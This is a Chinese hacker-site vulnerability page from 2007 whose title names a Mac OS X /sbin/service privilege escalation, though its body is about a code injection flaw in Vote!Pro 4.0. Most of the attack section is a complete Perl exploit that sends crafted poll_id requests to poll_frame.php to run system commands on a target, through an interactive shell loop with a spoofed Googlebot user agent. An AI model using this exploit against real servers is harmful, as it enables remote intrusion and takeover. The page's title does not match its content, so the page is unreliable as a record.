| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> 漏洞 >> 本地 >> 正文 用户登录 新用户注册
[推荐]Apple Mac OS X /sbin/service本地权限提升漏洞         ★★★ 【字体:
Apple Mac OS X /sbin/service本地权限提升漏洞
作者:不详 文章来源:华盟收集 点击数: 更新时间:2007-1-25

受影响系统:
Vote! Pro Vote! Pro 4.0
描述:
--------------------------------------------------------------------------------
Vote!Pro是一个可以自定义的在线投票和调查程序。

Vote!Pro处理有用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。

Vote!Pro的poll_frame.php文件没有正确地过滤eval()调用所使用的poll_id参数,允许攻击者通过提交特制的参数值注入并执行任意PHP代码。

<*来源:r0ut3r (writ3r@gmail.com
 
  链接:http://secunia.com/advisories/23834/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          Vote-Pro Code Injection 0day Exploit                                 #
#################################################################################################
# Software: Vote-Pro 4.0                                                                        #
#                                                                                               #
# Vendor: http://www.vote-pro.com/                                                              #
#                                                                                               #
# Released: 2007/01/23                                                                          #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for Vote-Pro administrator                 #
# testing purposes only!                                                                        #
#################################################################################################

use IO::Socket;

$port = "80"; # connection port
$target = shift; # vote-pro.com
$folder = shift; # /votepro/

sub Header()
{
    print q
    {Vote-Pro Code Injection Exploit - writ3r [at] gmail.com
-------------------------------------------------------
};
}

sub Usage()
{
    print q
    {
Usage: votecmd.pl [target] [directory]
Example: votecmd.pl vote-pro.com /votepro/
};
    exit();
}

Header();

if (!$target || !$folder) {
    Usage(); }

print "[+] Connecting...\n";
$cmd = "dir";
while ($cmd !~ "exit")
{
    $xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
    print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=".substr($cmd, 0, -1)."; HTTP/1.1\n";
    print $xpack "Host: $target\n";
    print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
    print $xpack "Accept: text/html\n";
    print $xpack "Connection: keep-alive\n\n";

    print "[cmd]\$ ";
    $cmd = <STDIN>;
    $cmd =~ s/ /%20/g;
}

print "[!] Connection to host lost...\n";

建议:
--------------------------------------------------------------------------------
厂商补丁:

Vote! Pro
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vote-pro.com/

责任编辑:胡浪  联系方式  Email:胡浪
电话:51228163
  • 上一篇漏洞:

  • 下一篇漏洞:
  • 最新hack更新
    最新推荐资讯
    相关漏洞
    多个远程安全漏洞
    Microsoft IIS提升漏洞
    LSASS本地特权提升
    图像本地权限提升漏洞
    Linux本地权限提升漏洞
    硬件检测权限提升漏洞
    微软内核本地权限漏洞
    ZoneAlarm防火墙产品有多个本地权
    Windows平台的Cisco VPN 客户端多
    Sun Java 运行时环境字体解析App
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号